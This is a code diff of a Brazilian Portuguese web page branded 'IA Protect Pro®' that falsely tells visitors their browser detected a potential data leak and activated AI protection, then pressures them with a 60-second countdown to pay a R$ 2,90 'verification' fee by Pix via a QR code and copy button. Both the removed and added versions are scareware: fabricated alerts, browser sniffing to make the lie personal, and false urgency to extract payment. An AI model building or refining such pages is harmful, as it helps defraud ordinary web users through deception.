--- a/index.html
+++ b/index.html
@@ -1,149 +1,116 @@
 <!DOCTYPE html>
-<html lang="pt-br">
+<html lang="pt-BR">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>IA Protect Pro® – Varredura de Segurança</title>
   <style>
     body {
-      margin: 0;
-      font-family: "Segoe UI", sans-serif;
-      background-color: #f8f9fb;
-      color: #333;
+      font-family: Arial, sans-serif;
+      background-color: #f8f9fa;
       text-align: center;
+      padding: 40px 20px;
     }
-    header {
-      padding: 20px;
-      font-weight: bold;
-      font-size: 18px;
+    .cadeado {
+      font-size: 1.5em;
+      color: #f0b429;
     }
-    .scan-section {
-      padding: 60px 20px;
+    .logo {
+      width: 60px;
+      margin: 20px auto;
     }
-    .spinner {
-      border: 8px solid #eee;
-      border-top: 8px solid #00c853;
-      border-radius: 50%;
-      width: 80px;
-      height: 80px;
-      animation: spin 2s linear infinite;
-      margin: 30px auto;
-    }
-    @keyframes spin {
-      0% { transform: rotate(0deg); }
-      100% { transform: rotate(360deg); }
-    }
-    .hidden {
-      display: none;
-    }
-    .alert {
+    .alerta {
       color: red;
       font-weight: bold;
-      margin-top: 10px;
     }
-    .shield {
-      font-size: 50px;
-      margin-top: 30px;
-    }
-    .pix-box {
-      background-color: #eee;
-      padding: 15px;
-      margin: 20px auto;
-      width: fit-content;
-      border-radius: 8px;
-      font-family: monospace;
-    }
-    button.copy-btn {
-      background-color: #00c853;
-      color: white;
-      border: none;
-      padding: 12px 24px;
-      border-radius: 8px;
-      cursor: pointer;
-      font-weight: bold;
-      font-size: 16px;
-    }
-    .countdown {
+    .info {
+      margin: 15px 0;
       font-size: 18px;
-      margin-top: 20px;
+    }
+    .bold {
       font-weight: bold;
+    }
+    .qr {
+      margin: 20px auto;
+      width: 200px;
     }
     .pix-logo {
-      height: 18px;
+      height: 14px;
       vertical-align: middle;
-      margin-left: 8px;
+      margin-left: 6px;
+    }
+    .copy-btn {
+      background-color: #e0e0e0;
+      border: none;
+      padding: 10px;
+      margin-top: 10px;
+      cursor: pointer;
+      border-radius: 6px;
+      font-family: monospace;
+    }
+    .contador {
+      font-size: 16px;
+      color: #333;
+      margin-top: 10px;
     }
   </style>
 </head>
 <body>
 
-  <header>🔒 IA Protect Pro®</header>
+  <div class="cadeado">🔒 IA Protect Pro®</div>
+  <img class="logo" src="https://i.imgur.com/3zB1UvB.png" alt="Escudo IA Protect">
 
-  <!-- TELA 1: ANIMAÇÃO DE VARREDURA -->
-  <div id="scan" class="scan-section">
-    <h2>Varredura de segurança em andamento...</h2>
-    <div class="spinner"></div>
-    <p>Aguarde enquanto o IA Protect Pro® analisa sua conexão.</p>
+  <h2>Segurança de conexão ativada</h2>
+  <p class="alerta">🚨 Vazamento de dados em potencial detectado.</p>
+
+  <p class="info">O navegador <span class="bold" id="browser-name">detectando...</span> ativou automaticamente o protocolo <span class="bold">IA Protect Pro®</span>, com tecnologia baseada em Inteligência Artificial.</p>
+
+  <p class="info">Para concluir a proteção em tempo real e garantir estabilidade durante sua navegação, realize a autenticação abaixo:</p>
+
+  <p class="info">
+    🟡 <span class="bold">Valor único de verificação: R$ 2,90</span>
+    <img class="pix-logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/04/Logo_pix_2020.png/120px-Logo_pix_2020.png" alt="Pix">
+  </p>
+
+  <p style="font-size: 13px;">(IA Protect opera por menos de $0.55 USD internacionalmente)</p>
+
+  <img class="qr" src="https://api.qrserver.com/v1/create-qr-code/?size=200x200&data=00020126360014BR.GOV.BCB.PIX0111qrfakepixkey" alt="QR Code Pix">
+  
+  <div>
+    <button class="copy-btn" onclick="copiarPix()">00020126360014BR.GOV.BCB.PIX0111qrfakepixkey</button>
   </div>
 
-  <!-- TELA 2: ALERTA E PAGAMENTO -->
-  <div id="alerta" class="hidden">
-    <div class="shield">🛡️</div>
-    <h2>Segurança de conexão ativada</h2>
-    <p class="alert">🚨 Vazamento de dados em potencial detectado.</p>
-    <p>O navegador <strong><span id="browser-name"></span></strong> ativou automaticamente o protocolo <strong>IA Protect Pro®</strong>, com tecnologia baseada em Inteligência Artificial.</p>
-    <p>Para concluir a proteção em tempo real e garantir estabilidade durante sua navegação, realize a autenticação abaixo:</p>
-
-    <p style="margin-top: 20px;">
-      <strong>🟡 Valor único de verificação: R$ 2,90 
-        <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/Pix_Logo_2021.svg" class="pix-logo" alt="Pix Logo"/>
-      </strong><br>
-      <small>(IA Protect opera por menos de $0.55 USD internacionalmente)</small>
-    </p>
-
-    <img src="https://api.qrserver.com/v1/create-qr-code/?size=150x150&data=00020126360014BR.GOV.BCB.PIX0111qrfakepixkey" alt="QR Code Pix"/>
-
-    <p class="pix-box" id="pixCode">00020126360014BR.GOV.BCB.PIX0111qrfakepixkey</p>
-    <button class="copy-btn" onclick="copyPix()">Copiar código Pix</button>
-
-    <div class="countdown" id="countdown">Tempo restante: 60 segundos...</div>
+  <div class="contador">
+    ⏳ Sua autenticação expira em <span id="timer">60</span> segundos.
   </div>
 
   <script>
-    function getBrowser() {
-      const ua = navigator.userAgent;
-      if (ua.includes("Chrome") && !ua.includes("Edg") && !ua.includes("OPR")) return "Google Chrome";
-      if (ua.includes("Firefox")) return "Mozilla Firefox";
-      if (ua.includes("OPR") || ua.includes("Opera")) return "Opera";
-      if (ua.includes("Edg")) return "Microsoft Edge";
-      return "Seu navegador";
-    }
+    // Detectar navegador
+    const navegador = navigator.userAgent;
+    const browserName = navegador.includes("Firefox") ? "Mozilla Firefox" :
+                        navegador.includes("OPR") || navegador.includes("Opera") ? "Opera" :
+                        navegador.includes("Chrome") ? "Google Chrome" :
+                        "seu navegador";
 
-    setTimeout(() => {
-      document.getElementById("scan").classList.add("hidden");
-      document.getElementById("alerta").classList.remove("hidden");
-      document.getElementById("browser-name").innerText = getBrowser();
-    }, 5000);
+    document.getElementById("browser-name").textContent = browserName;
 
-    function copyPix() {
-      const text = document.getElementById("pixCode").innerText;
-      navigator.clipboard.writeText(text).then(() => {
-        alert("Código Pix copiado com sucesso!");
+    // Timer regressivo
+    let tempo = 60;
+    const timerEl = document.getElementById("timer");
+    const intervalo = setInterval(() => {
+      tempo--;
+      timerEl.textContent = tempo;
+      if (tempo <= 0) clearInterval(intervalo);
+    }, 1000);
+
+    // Copiar chave Pix
+    function copiarPix() {
+      const chave = "00020126360014BR.GOV.BCB.PIX0111qrfakepixkey";
+      navigator.clipboard.writeText(chave).then(() => {
+        alert("Chave Pix copiada!");
       });
     }
-
-    let seconds = 60;
-    const countdownEl = document.getElementById("countdown");
-    const interval = setInterval(() => {
-      seconds--;
-      countdownEl.textContent = `Tempo restante: ${seconds} segundos...`;
-      if (seconds <= 0) {
-        clearInterval(interval);
-        countdownEl.textContent = "Aguardando confirmação de pagamento...";
-      }
-    }, 1000);
   </script>
 
 </body>
 </html>
-
